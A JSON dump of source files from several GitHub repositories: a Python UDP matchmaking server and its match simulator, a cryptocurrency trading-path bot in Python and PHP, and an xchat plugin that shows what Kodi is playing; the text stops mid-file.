assignLobbyRoom(user_profile):\n rankingScore = user_profile['score']\n\n # Sort connecting clients into rooms based on their rank score\n for tier in playerTiers.keys():\n if int(rankingScore) <= tier or tier == 1500:\n\n playerTiers[tier]['players'].append(user_profile) # Add user to tier list\n \n # Player was assigned to an empty lobby, so start tracking wait time here\n if len(playerTiers[tier]['players']) == 1:\n playerTiers[tier]['waitTime'] = datetime.now()\n \n break\n\ndef assignMatchRoom(sock):\n for tier in playerTiers.keys():\n \n # There are more than 3 players waiting in the current tier, so immediately create a match\n if len(playerTiers[tier]['players']) >= 3:\n generateMatch(sock, tier, 3)\n\n # There are two players waiting in the current tier, wait for a third unless they have waited too long\n # If they waited too long, create a match for 2 players\n elif len(playerTiers[tier]['players']) == 2 and (datetime.now() - playerTiers[tier]['waitTime']).total_seconds() > 5:\n generateMatch(sock, tier, 2)\n\ndef generateMatch(sock, tier, numPlayersInMatch):\n matchId = Matches.numMatches\n matchInfo = {\"matchId\" : matchId, \"players\" : [], \"results\" : {}, \"startTime\" : str(datetime.now())}\n Matches.numMatches+=1\n\n # Assign first numPlayersInMatch players from the tier to the match\n for i in range(0, numPlayersInMatch):\n matchInfo[\"players\"].append(playerTiers[tier]['players'].pop(0))\n\n # Create a new socket for this match\n newSock = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n newSock.bind(('',0))\n matchInfo[\"matchSocket\"] = newSock.getsockname()\n\n Matches.matches[matchId] = matchInfo\n\n # Send match info to involved players\n for player in matchInfo[\"players\"]:\n m = json.dumps(matchInfo)\n sock.sendto(bytes(m,'utf8'), player['address'])\n print(\"Sent matchInfo to \" + str(player['address']))\n\n # Start new thread for the match\n start_new_thread(manageMatch, (newSock, matchId,))\n\ndef manageMatch(sock, matchId):\n matchMsgList = {'matchState': \"Begin\", 'players':{}}\n playersInMatch = Matches.matches[matchId][\"players\"]\n start_new_thread(matchConnectionLoop,(matchMsgList,sock,))\n print(\"matchsocket name \" + str(matchId) + \" \" + str(sock.getsockname()))\n\n response = None\n\n # Match loop\n while len(playersInMatch) > 0:\n\n # Process results of the match\n if len(matchMsgList['players']) > 0:\n if matchMsgList['matchState'] == \"End\":\n lambdaEndpoint = \"https://ohe5ppwqv2.execute-api.us-east-2.amazonaws.com/default/UpdatePlayerScore\"\n\n players = matchMsgList['players']\n\n # Results should be the same across players, so only need to call lambda once\n if response == None:\n response = requests.get(lambdaEndpoint, data=players[list(players.keys())[0]])\n responseBody = json.loads(response.content)\n responseBody = json.dumps(responseBody)\n\n # Send results to all player to let them know that the match is over\n for addr in matchMsgList['players']:\n sock.sendto(bytes(responseBody, 'utf8'), addr)\n\n # Match end - close socket as soon as all players notified\n playersInMatch = Matches.matches[matchId][\"players\"]\n playersInMatch.pop()\n\n print(matchMsgList)\n\n time.sleep(1)\n sock.close()\n\ndef matchConnectionLoop(msgList, sock):\n # Loop to process gameplay for the match\n\n while True:\n try:\n print(\"WAITING ON \" + str(sock.getsockname()))\n data, addr = sock.recvfrom(1024)\n msgList[\"matchState\"] = json.loads(data)[\"matchState\"]\n msgList['players'][addr] = data\n except:\n print(\"Match Over\")\n break;\n\ndef gameLoop(sock):\n while True:\n\n # Players have been assigned to lobbies, try to start a match\n\n # Assign clients to matches\n assignMatchRoom(sock)\n\n GameState = {\"cmd\": 1, \"players\": []}\n clients_lock.acquire()\n #print (clients)\n\n for c in clients:\n player = {}\n player['id'] = str(c)\n GameState['players'].append(player)\n \n s=json.dumps(GameState)\n #print(s)\n \n for c in clients:\n sock.sendto(bytes(s,'utf8'), (c[0],c[1]))\n \n clients_lock.release()\n time.sleep(1/30)\n\ndef requestAPI(userId):\n lambdaEndpoint = \"https://z67un5qyea.execute-api.us-east-2.amazonaws.com/default/MatchMaking\"\n requestBody = json.dumps({\"user_id\": str(userId)})\n\n response = requests.get(lambdaEndpoint, data=requestBody)\n responseBody = json.loads(response.content)\n\n return responseBody\n\ndef main():\n print(\"Server started\")\n\n port = 12345\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.bind(('', port))\n start_new_thread(gameLoop, (s,))\n start_new_thread(connectionLoop, (s,))\n start_new_thread(cleanClients,(s,))\n while True:\n time.sleep(1/30)\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6580958962440491, "alphanum_fraction": 0.6761640310287476, "avg_line_length": 21.13846206665039, "blob_id": "f7bbddd86c4123157dc339c891bf39b9128736a1", "content_id": "90b206f41b9ca97794917b732d302db58407a349", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2878, 
"license_type": "no_license", "max_line_length": 85, "num_lines": 130, "path": "/Simulation.py", "repo_name": "kossam001/GAME3110-Assignment3", "src_encoding": "UTF-8", "text": "import socket\nimport json\nimport requests\nfrom _thread import *\nimport threading\nimport time \nimport random\nimport sys\n\nmatch_lock = threading.Lock()\nmatches = {}\nmatchLogs = {}\n\nplayerIds = []\n\nclass Match:\n\tnumMatches = 0;\n\nserver_address = ('3.130.200.122', 12345)\n\ndef connectClientToServer(userId, sock):\n\tmessageBody = {}\n\tmessageBody['connect'] = None\n\tmessageBody['user_id'] = str(userId)\n\n\tm = json.dumps(messageBody)\n\tsock.sendto(bytes(m,'utf8'), server_address)\n\n\tprint(str(userId) + \" connected to server\")\n\n\tdata, serverAddr = sock.recvfrom(1024)\n\tdata = json.loads(data)\n\n\tmatchPort = data['matchSocket'][1]\n\tprint(matchPort)\n\n\t# Store match data\n\t# That way the clients have access to the same data\n\tmatch_lock.acquire()\n\tmatches[data['matchId']] = data\n\tmatch_lock.release()\n\n\tplayMatch(userId, data['matchId'], matchPort, sock,)\n\ndef playMatch(userId, matchId, matchPort, serverSock):\n\tprint(str(userId) + \" Start Match\")\n\tmatchSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tmatchSock.connect((server_address[0], matchPort))\n\tprint(\"match \" + str(matchId) + \" on socket \" + str((server_address[0], matchPort)))\n\n\tmatch_lock.acquire()\n\n\tif (len(matches[matchId]['results']) == 0):\n\t\tplayers = matches[matchId]['players']\n\n\t\t# Pick a random winner id\n\t\trandWinner = players[random.randint(0, len(players)-1)]['user_id']\n\n\t\tprint(randWinner + \" wins\")\n\n\t\tmatches[matchId]['results'][randWinner] = 'win'\n\n\t\t# Everyone that isn't a winner is a loser\n\t\tfor player in players:\n\t\t\tif (player['user_id'] != randWinner):\n\t\t\t\tmatches[matchId]['results'][player['user_id']] = 'lose'\n\n\t\tmatches[matchId]['matchState'] = \"End\"\n\n\t#print(str(userId) + \" End Match\")\n\tmatch_lock.release()\n\n\tm = json.dumps(matches[matchId])\n\tmatchSock.sendto(bytes(m,'utf8'), (server_address[0], matchPort))\n\n\t#time.sleep(5)\n\tprint(\"Match finish\")\n\n\t# Add result to log\n\tdata = matchSock.recvfrom(1024)\n\n\tprint(str(userId) + \" End Match\")\n\n\t# Since every player will have the same copy of results, use this to keep one copy\n\tif matchId not in matchLogs.keys():\n\t\tMatch.numMatches+=1;\n\t\tmatchLogs[matchId] = data\n\n\tplayerIds.append(userId)\n\n\twhile True:\n\t\ttime.sleep(1/30)\n\ndef main(numSimulations):\n\tfor i in range(0, 10):\n\t\tplayerIds.append(i)\n\n\twhile Match.numMatches < numSimulations:\n\t\tif (len(playerIds) > 0):\n\t\t\ti = playerIds.pop()\n\n\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\tsock.connect(server_address)\n\n\t\t\tstart_new_thread(connectClientToServer, (i, sock, ))\n\n\tf = open(\"matchResult.txt\", \"w\")\n\tfor match in matchLogs.items():\n\t\tf.write(\"\\n\")\n\t\tf.write(\"Match ID: \" + str(match[0]))\n\t\tf.write(\"\\n\")\n\n\t\tfor player in (json.loads((match[1])[0]))['players']:\n\t\t\tf.write(str(player))\n\t\t\tf.write(\"\\n\")\n\n\t\tf.write(\"\\n\")\n\n\t\tprint(\"\\n\")\n\t\tprint(match)\n\n\tf.close()\n\n\ttime.sleep(1/30)\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain(int(sys.argv[1]))\n\texcept:\n\t\tmain(10)\n" } ]
2
gpierron/KodiNowPlaying
https://github.com/gpierron/KodiNowPlaying
ea4cfd65940f715ef7592ebcf27dacd903cbe107
4adc6635e93a791221ba703edad1dce43bcf14e2
9cc81116d4ef20d9e7ad35c545191835f89d89db
refs/heads/master
2020-05-29T13:58:02.720394
2015-02-12T21:11:00
2015-02-12T21:11:00
24,105,106
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5340264439582825, "alphanum_fraction": 0.5555292963981628, "avg_line_length": 29.014184951782227, "blob_id": "a6e1ed15cc172593df8262001197a5352ee88378", "content_id": "cd8b2e9949053260f84168ec829661ae39a075b0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4232, "license_type": "permissive", "max_line_length": 106, "num_lines": 141, "path": "/kodi_current.py", "repo_name": "gpierron/KodiNowPlaying", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# author (alterer is a more suitable word) : Guillaume Pierron - \"Guiwiz\"\n#\n# This script is largely based on the work of Arnaud Bertrand - \"Arn-O\"\n# You can find his original work (a wonderful python script to control XBMC) here :\n# https://github.com/Arn-O/py-xbmc-remote-controller\n#\n# This script is also based on the work (a python script for xchat/hexchat to control\n# the linux player amarok locally) of zir0faive, not publically available yet :) \n\n__module_name__ = \"Kodi NowPlaying\"\n__module_version__ = \"0.89c\"\n__module_description__ = \"A dirty/quickly adapted script to print currently playing music on distant Kodi\"\n\nprint \"\\003\",__module_name__, __module_version__,\"has been loaded\\003\"\n\nimport xchat\nimport socket\nimport json\nfrom string import Template\n\nBUFFER_SIZE = 1024\n\n''' USERS SHOULD MODIFY THIS SECTION '''\nXBMC_IP = \"192.168.1.210\"\nXBMC_PORT = 9090\n\n\n''' USERS MAY MODIFY THIS TOO '''\nCOMPATIBLE_ENCODING = 'iso-8859-1'\nSCRIPTCMD = 'zik'\n\n'''STRING FORMATTING PREFS PART'''\nTITLE = 'Kodi\u000f '\nDISPLAY_PATTERN = TITLE + '\u000315#\u000f \u0002$artist \u000315-\u000f $title ' + \\\n\t\t '\u000315(#\u000f$track \u000315-\u000f $album \u000315-\u000f $year\u000315)\u000f ' + \\\n\t\t '\u000315[\u000f$p_min\u000315:\u000f$p_0sec\u000315/\u000f$t_min\u000315:\u000f$t_0sec ' + \\\n\t\t '\u000315,15$elapsed\u000314,14$remaining\u000f\u000315]\u000f' \n\nBAR_LENGTH = 10\nCHAR_ELAPSED = '#'\nCHAR_REMAINING = '='\n\ndef now_playing(item, properties):\n if item:\n #constructing initial data\n full_data = {}\n full_data.update(item)\n full_data.update(properties)\n \n # retrieving first artist field only\n if item['artist']:\n full_data['artist'] = item['artist'][0]\n\n # computing progress bar and time values\n n = int(BAR_LENGTH * properties['percentage'] / 100)\n full_data['elapsed'] = CHAR_ELAPSED * n\n full_data['remaining'] = CHAR_REMAINING * (BAR_LENGTH - n)\n full_data['p_min'] = properties['time']['hours'] * 60 + \\\n properties['time']['minutes'] \n full_data['p_0sec'] = \"%02d\" % properties['time']['seconds']\n full_data['t_min'] = properties['totaltime']['hours'] * 60 + \\\n properties['totaltime']['minutes'] \n full_data['t_0sec'] = \"%02d\" % properties['totaltime']['seconds']\n \n\n str_ret = Template(DISPLAY_PATTERN).substitute(full_data)\n \n else:\n str_ret= \"[is not playing anything]\"\n return str_ret\n\ndef get_item(ip, port):\n command = {\"jsonrpc\": \"2.0\",\n \"method\": \"Player.GetItem\",\n \"params\": {\n \"playerid\": 0,\n \"properties\": [\n \"album\",\n \"title\",\n \"track\",\n \"artist\",\n \"year\",\n \"genre\" ] },\n \"id\": 1}\n ret = call_api(ip, port, command)\n item = None\n try:\n item = ret['result']['item']\n except KeyError:\n pass\n return item\n\ndef get_properties(ip, port):\n command = {\"jsonrpc\": \"2.0\",\n \"method\": \"Player.GetProperties\",\n \"params\": {\n \"playerid\": 0,\n \"properties\": [\n \"time\",\n \"totaltime\",\n \"percentage\",\n 
\"position\"] },\n \"id\": 1}\n ret = call_api(ip, port, command)\n result = None\n try:\n result = ret['result']\n except KeyError:\n pass\n return result\n\ndef call_api(ip, port, command):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((ip, port))\n s.send(json.dumps(command))\n data = ''\n while True:\n filler = s.recv(BUFFER_SIZE)\n data += filler\n nb_open_brackets = data.count('{') - data.count('}')\n if nb_open_brackets == 0:\n break\n s.close()\n ret = json.loads(data)\n return ret\n\n\ndef play_what():\n item = get_item(XBMC_IP, XBMC_PORT)\n properties = get_properties(XBMC_IP, XBMC_PORT)\n return now_playing(item, properties)\n\ndef xchat_kodi_cmd(argv, arg_to_eol, c):\n if len(argv) == 1:\n current=play_what()\n xchat.command('me %s' % current.encode(COMPATIBLE_ENCODING))\n return xchat.EAT_ALL\n\nxchat.hook_command(SCRIPTCMD, xchat_kodi_cmd, help=\"/\"+SCRIPTCMD)\n" }, { "alpha_fraction": 0.7009345889091492, "alphanum_fraction": 0.7009345889091492, "avg_line_length": 25.75, "blob_id": "8c63aa5a3cd58cf0b033a186480f64e33c34b2cd", "content_id": "55ebf2e160d2184b4910846cb4f5dfa90d47df49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 107, "license_type": "permissive", "max_line_length": 75, "num_lines": 4, "path": "/README.md", "repo_name": "gpierron/KodiNowPlaying", "src_encoding": "UTF-8", "text": "KodiNowPlaying\n==============\n\nxchat / hexchat python plugin to display XBMC / Kodi currently playing song\n" } ]
2
mensrex/Swaedes_project
https://github.com/mensrex/Swaedes_project
214b53eb6ebf879c8754423b90cdf130af6d3100
0da420a66cdf474ab13600845a65d008fe5b20a1
0750550e97c51845537d8222304524a6320374c0
refs/heads/master
2021-01-18T00:59:23.481500
2016-04-01T11:05:37
2016-04-01T11:05:37
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 18, "blob_id": "f18b1bfc4cc8e48c8c9f5900b4fce4e55da95554", "content_id": "9d7e390b263cdccf6cd9e364db48a79aa7b419e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 39, "license_type": "no_license", "max_line_length": 19, "num_lines": 2, "path": "/README.md", "repo_name": "mensrex/Swaedes_project", "src_encoding": "UTF-8", "text": "# Swaedes_project\nAndroid app project \n" }, { "alpha_fraction": 0.662420392036438, "alphanum_fraction": 0.662420392036438, "avg_line_length": 28.66666603088379, "blob_id": "8b8465e1da030e06eff7e60760134604b9dff1a6", "content_id": "4a5122484ccd50d2c9c534fc991fbf716bdafe91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "no_license", "max_line_length": 72, "num_lines": 21, "path": "/Django/SWAEDES/models.py", "repo_name": "mensrex/Swaedes_project", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass PictureAndData(models.Model):\n localisation=models.TextField()\n GPS=models.TextField()\n photo=models.ImageField(upload_to=\"photos/\")\n photoPath=models.TextField()\n commentary=TextField()\n id=models.Integer.Field()\n idUser=TextField()\n\n def __str__(self,_localisation,_GPS,_photo,_commentary,_id,_idUser):\n self.localisation=_localisation\n self.GPS=_GPS\n self.photo=_photo\n self.commentary=_commentary\n self.id=_id\n self.idUser=_idUser\n self.photoPath=self.photo.path\n return self\n \n" } ]
2
rcshadman/TradeBot-1
https://github.com/rcshadman/TradeBot-1
7c2c1139360d434797ddc35a9e705297d6d27c56
957c323b9aa52a0058acad121b36e41eb1436248
95654aebbbb0991751c13ec59ce065d45ea58633
refs/heads/master
2021-09-03T14:18:00.422140
2018-01-09T18:50:08
2018-01-09T18:50:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5478348731994629, "alphanum_fraction": 0.5520644783973694, "avg_line_length": 30.826923370361328, "blob_id": "e7c52cec3daa0fa3636df375f6b4d8527b9bc51e", "content_id": "11c6a290968ab47e2dad50165c290f6aac635dc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4965, "license_type": "no_license", "max_line_length": 84, "num_lines": 156, "path": "/python/tree_func.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "def treeToList(rootNode):\n ''' rootNode is the root of the tree\n returns a list containing all branches,\n where each branch is a list containing TradingPairs'''\n branchList = []\n\n \"\"\" Iterative approach\n branchOfBreadth = [[]]\n breadth = [rootNode]\n i = 0\n while(len(breadth)):\n i += 1\n #print(i)\n # take out first item of each list\n crBranch = branchOfBreadth[0]\n\n #print(len(crBranch))\n if (len(crBranch) > 8):\n for i in crBranch: print(i, end='')\n exit()\n\n branchOfBreadth.remove(crBranch)\n crNode = breadth[0]\n breadth.remove(crNode)\n\n # update the visited and breadth list\n crBranch.append(crNode)\n\n kids = crNode.getChildren()\n if len(kids) == 0:\n branchList.append(crBranch)\n\n for c in kids:\n breadth.append(c)\n branchOfBreadth.append(list(crBranch))\n\n \"\"\"\n def populateBranchList(node, branch = []):\n kids = node.getChildren()\n\n branch.append(node)\n if len(kids) == 0: # reached leaf\n branchList.append(branch)\n else:\n for k in kids:\n populateBranchList(k, list(branch))\n\n populateBranchList(rootNode) # \"\"\"\n return branchList\n\n\ndef getTreeStats(rootNode):\n ''' return info on the amount of leaves, amount of branches of diff lengths,\n and the str repr of the tree itself '''\n treeStr = rootNode.nodeStr()\n\n lines = treeStr.split(\"\\n\")\n\n leaves = {}\n totalLeaves = 0\n for line in lines:\n linelist = line.split()\n #print(linelist)\n if linelist[-1] == \"0\": # found a leaf\n totalLeaves += 1\n\n dictKey = linelist[0]+\"steps\"\n if dictKey in leaves:\n leaves[dictKey] += 1\n\n else:\n leaves[dictKey] = 1\n\n leaves[\"total\"] = totalLeaves\n leaves[\"start\"] = str(rootNode)\n return treeStr, leaves\n\ndef populateTree(tradingPairs, rootNode):\n ''' populateTree([TradingPairs], TradingPair) -> rootNode'''\n firstCoin = rootNode.getHead()\n\n \"\"\"\n visitedOfBreadth = [set()]\n breadth = [rootNode]\n i = 0\n while(len(breadth)):\n i+=1\n #print(i)\n # take out first item of each list\n crVisited = visitedOfBreadth[0]\n visitedOfBreadth.remove(crVisited)\n crNode = breadth[0]\n breadth.remove(crNode)\n\n if crNode.getTail() == firstCoin:\n continue; # no need for nextNodes if we successfully formed a loop\n\n crVisited.add(crNode.getTail())\n #print(crVisited)\n nextNodes = list(filter( lambda x: crNode.comesBefore(x) and\n x.getTail() not in crVisited\n , tradingPairs ))\n #print(len(nextNodes))\n # update the visited and breadth list\n for nextNode in nextNodes:\n child = nextNode.duplicate()\n crNode.addChild(child)\n breadth.append(nextNode)\n visitedOfBreadth.append(set(crVisited))\n\n if len(nextNodes) == 0:\n ''' remove the branch leading up to leaf; Delete all the way up\n from leaf to root, stop only if the parent has > 1 children '''\n #print(\"{} -X-> {}\".format(crNode, firstCoin))\n parent = crNode.getParent()\n while parent is not None:\n kids = parent.getChildren()\n parent.rmChild(crNode)\n #print(\"lala\\t\"+str(len(kids)))\n if len(kids) > 0:\n break\n\n # crParent cannot lead to other children, so keep 
deleting\n parent = parent.getParent()\n\n \"\"\"\n #for p in tradingPairs: print(p)\n def recurse(crNode, visitedNodes = set()):\n '''determines whether the crNode will lead to forming a valid path'''\n if crNode.getTail() == firstCoin: # crNode leads back to firstCoin\n #print(str(crNode)+\" reached end\")\n return True\n\n visitedNodes.add(crNode.getTail())\n nextNodes = list(filter( lambda x: crNode.comesBefore(x) and\n x.getTail() not in visitedNodes\n , tradingPairs ))\n\n #print(\"{}->{}kids\".format(crNode, len(nextNodes)) )\n #for p in nextNodes: print(p, end=\"\")\n #print()\n\n for nextNode in nextNodes:\n child = nextNode.duplicate()\n if recurse( child, set(visitedNodes) ): # make a copy of visitedNodes\n crNode.addChild(child) # only add pairs that leads to forming a path\n\n # crNode leads to forming a path => prevNode should adopt crNode as child\n return len(crNode.getChildren())\n\n recurse(rootNode)\n #recurse(rootNode, {rootNode.getTail()}, {rootNode.getSymbol()} )\n # \"\"\"\n\n\n return rootNode\n" }, { "alpha_fraction": 0.5615212321281433, "alphanum_fraction": 0.563758373260498, "avg_line_length": 23.83333396911621, "blob_id": "1781e1f3f09a3f2e1641970d872ca385f16f6c96", "content_id": "cb8da537efcd2cad579c70cb3aa63b897af8eb74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "no_license", "max_line_length": 66, "num_lines": 18, "path": "/python/helper_func.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nfrom sys import stderr\nimport json\n\ndef eprint(*args, **kwargs):\n print(*args, file=stderr, **kwargs)\n\ndef reFormatJSON(pyRes, keys = []):\n tmp = pyRes;\n\n if len(keys):\n tmp = {}\n for key in pyRes:\n print(\"{} in {} is {}\".format(key, keys, key in keys))\n if key in keys:\n tmp[key] = pyRes[key];\n\n return json.dumps(tmp, sort_keys=True, indent=4)\n" }, { "alpha_fraction": 0.5373352766036987, "alphanum_fraction": 0.5387994050979614, "avg_line_length": 22.55172348022461, "blob_id": "e1dab0615b969ecdd8ff07825728c152e5120b06", "content_id": "a54f37d3e48ce00f96e7999bdc2cd6e8699ccefd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 683, "license_type": "no_license", "max_line_length": 89, "num_lines": 29, "path": "/web/php/send_req.php", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\n<html>\n <head>\n <meta charset=\"utf-8\">\n <title>sends and receives GET/POST request</title>\n </head>\n\n <?php\n require_once(\"gen_func.php\");\n\n if ($_GET['reqType'] == 'public'){\n require_once($_GET['platform'].\"/public_req.php\");\n } else if ($_GET['reqType'] == 'private'){\n require_once('trader.php');\n require_once($_GET['platform'].'/zqis.php'); //setup vars $api_key and $api_secret\n require_once($_GET['platform'].'/bot.php');\n require_once($_GET['platform'].'/private_req.php');\n }\n ?>\n\n <body>\n <a class = \"json_response\">\n <?php\n echo call_func($_GET['cmd']);\n ?>\n </a>\n\n </body>\n</html>\n" }, { "alpha_fraction": 0.48977556824684143, "alphanum_fraction": 0.4947631061077118, "avg_line_length": 29.378787994384766, "blob_id": "9a4963d5ce6cb4129c5edb94256f78fb009bc778", "content_id": "10c9444bd817204e5ae2c6f488d4f223daba8d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2005, "license_type": "no_license", "max_line_length": 89, "num_lines": 66, "path": 
"/python/tp_func.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "from TradingPair import TradingPair\n\ndef getAllTPs(platform, validSymbols):\n tradingPairs = []\n for symbol in validSymbols:\n pl = symbol2pl(platform, symbol)\n tradingPairs.append( TradingPair(pl) )\n pl.reverse()\n tradingPairs.append( TradingPair(pl, isInverted = True) )\n\n return tradingPairs\n\ndef ps2TP(plat, ps, validpsSet):\n ''' pl2TP(poloniex, [\"btc-ltc\"], [\"btc-ltc\"]) -> TP([btc,ltc], not inverted)\n pl2TP(poloniex, [\"ltc-btc\"], [\"btc-ltc\") -> TP([btc,ltc], inverted)\n\n validpsSet is a set where each item is a ps'''\n\n return TradingPair(ps.split(\"-\"), platform = plat, isInverted = ps not in validpsSet)\n\ndef symbol2pl(plat, symbol):\n ''' func(bitfinex, btc-ltc) -> [btc,ltc] '''\n symbol = symbol.lower()\n delimiter = list(filter(lambda x: x in symbol,[\"-\",\"_\",\" \"]))\n if delimiter:\n tmp = symbol.split(delimiter[0])\n\n elif (len(symbol) == 6):\n tmp = [symbol[:3], symbol[3:]]\n\n else:\n # use dictionary to translate\n '''\n coinDict()\n for c in dict:\n if symbol startswith c:\n tmp = [symbol[:len(c)], symbol[len(c):]]\n elif symbol endswith c:\n tmp = [symbol[len(c):], symbol[:len(c)]]\n else: # not anything we know in coinDict\n mid = len(symbol)//2\n tmp = [symbol[:mid], symbol[mid:]]\n eprint(\"dict knows nothing about: \"+symbol)\n #exit()\n '''\n\n if (plat == \"bitfinex\"):\n pass\n\n elif (plat == \"poloniex\"):\n tmp.reverse()\n\n elif (plat == \"binance\"):\n pass\n\n elif (plat == \"yobit\"):\n pass\n\n else:\n print('''\n ################# ERROR ####################################################\n ## trying to process: |{}| for unrecognized platform: {}\n ################# ERROR ####################################################\n '''.format(tmp, plat))\n exit()\n return tmp\n" }, { "alpha_fraction": 0.6420404314994812, "alphanum_fraction": 0.6481969952583313, "avg_line_length": 22.6875, "blob_id": "56d957465b2137651299d0698c8c577ed27094ad", "content_id": "e87e7288b21ecf6292dcb1d2fb9c35e582312428", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 96, "num_lines": 48, "path": "/python/gen_resources.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "from helper_func import eprint\nimport sys\nif len(sys.argv) != 2:\n eprint(\"Usage: python test.py platform (opt: redirect to resources/platform/all_paths.txt)\")\n exit()\n\nfrom Trader import Trader\nfrom tree_func import *\nfrom tp_func import *\n\nplatform = sys.argv[1]\nbot = Trader(platform)\n\nonlinelist = bot.getValidPairs() # \"\"\"\ntotalPairs = len(onlinelist)\nprint(\"totalPairs: \"+str(totalPairs))\n\nreducedList = onlinelist[:totalPairs]\n\n#print(\"reducedList:\\n\"+str(reducedList))\n#print(\"onlinelist:\\n\"+str(onlinelist))\n#exit()\nnodelist = getAllTPs(platform, reducedList)\n#for p in nodelist: print(p)\n#print(len(nodelist))\n#exit()\n\ni=0\nfor r in nodelist:#[7:8]:\n i += 1\n rootPair = r\n eprint(\"{}\\t\\t {}/{}\".format(r, i, len(nodelist)))\n\n populateTree(nodelist, rootPair)\n #print(len(rootPair.getChildren()))\n #continue\n #exit()\n #'''\n allPaths = treeToList(rootPair)\n for path in allPaths:\n print(str(len(path)-1)+\"steps\", end='')\n for p in path:\n print(p, end='')\n print() # '''\n\n treeStr, pathStats = getTreeStats(rootPair)\n #print(treeStr)\n print(pathStats)\n" }, { "alpha_fraction": 0.5726223587989807, 
"alphanum_fraction": 0.5750099420547485, "avg_line_length": 28.564706802368164, "blob_id": "bd01a031b00bca3e9dd19775675b9a917ceddc5f", "content_id": "f54ade86ca1fda05ad63500746616c89930aa462", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2513, "license_type": "no_license", "max_line_length": 104, "num_lines": 85, "path": "/python/TradingPair.py", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "import json\n\nclass TradingPair:\n ''' contains information about a pair of coins that will help with\n algorithms in process.py'''\n\n def __init__(self, pairLst, symbol = \"\", platform = \"\", isInverted = False):\n ''' pairLst must contain two items, names (not aliases) of 2 coins\n i.e. they must have gone thr the translation process so now\n what they're called should no longer be platform specific'''\n\n self.__platform = platform\n self.__children = []\n self.__parent = None\n self.__symbol = symbol\n self.__head = pairLst[0] # this denotes the \"coin\"\n self.__tail = pairLst[1] # this denotes the \"currency\"\n\n self.__isInverted = isInverted\n\n def duplicate(self):\n ''' returns a duplicate of self except no children or parent '''\n return TradingPair([self.__head,self.__tail], self.__symbol, self.__platform, self.__isInverted)\n\n def getPlatform(self):\n return self.__platform\n\n def isInverted(self):\n return self.__isInverted\n\n def getSymbol(self):\n return self.__symbol\n\n def getHead(self):\n return self.__head\n\n def getTail(self):\n return self.__tail\n\n def comesBefore(self, other):\n ''' other is of type TradingPair\n returns whether other connects to tail of self like dominoes '''\n return self.__tail == other.getHead()\n\n def rmChild(self, child):\n #print(\"{} appending {}\".format(self, child));\n if child in self.__children:\n self.__children.remove(child)\n\n else:\n pass\n #throw error\n\n def addChild(self, child):\n #print(\"{} appending {}\".format(self, child));\n if child not in self.__children:\n self.__children.append(child)\n child.setParent(self)\n\n def getChildren(self):\n return self.__children\n\n def setParent(self, parent):\n self.__parent = parent\n\n def rmParent(self):\n self.__parent = None\n\n def getParent(self):\n return self.__parent\n\n def __str__(self):\n return '<>{}-{}'.format(self.__head, self.__tail)\n\n def nodeStr(self, level = 0):\n string = \"{}{}. 
{} -> {}\\n\".format(\"\\t\" * level, level, str(self), len(self.__children))\n\n for c in self.__children:\n string += c.nodeStr(level + 1) + \"\\n\"\n\n return string[:-1]\n\n def __eq__(self, other):\n return str(self) == str(other)\n #return self.__symbol == other.getSymbol()\n" }, { "alpha_fraction": 0.6151723861694336, "alphanum_fraction": 0.6179310083389282, "avg_line_length": 24, "blob_id": "7495d5534fbf020380a6a0cceda517a640ac4b3d", "content_id": "cd2f546b155662e49d3845cd34bde248ddbd50d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 725, "license_type": "no_license", "max_line_length": 101, "num_lines": 29, "path": "/web/php/gen_func.php", "repo_name": "rcshadman/TradeBot-1", "src_encoding": "UTF-8", "text": "<?php // functions that gets used by all php scripts\n\nfunction getJSONstr($url, $headers = \"\", $method = \"GET\"){\n $opts = array('http' =>\n array(\n 'method' => $method,\n 'timeout' => 10,\n 'header' => $headers\n )\n );\n\n $context = stream_context_create($opts);\n $jsonStr = file_get_contents($url, false, $context);\n return $jsonStr;\n}\n\nfunction getJSON($url, $headers = \"\"){\n return json_decode(getJSONstr($url, $headers), true);\n}\n\nfunction handlingErr($msg){\n throw new Exception(\"\\n{$_GET['platform']}/{$_GET['reqType']}_req.php\\nHandling unknown $msg\\n\");\n}\n\nfunction invalidErr($msg){\n throw new 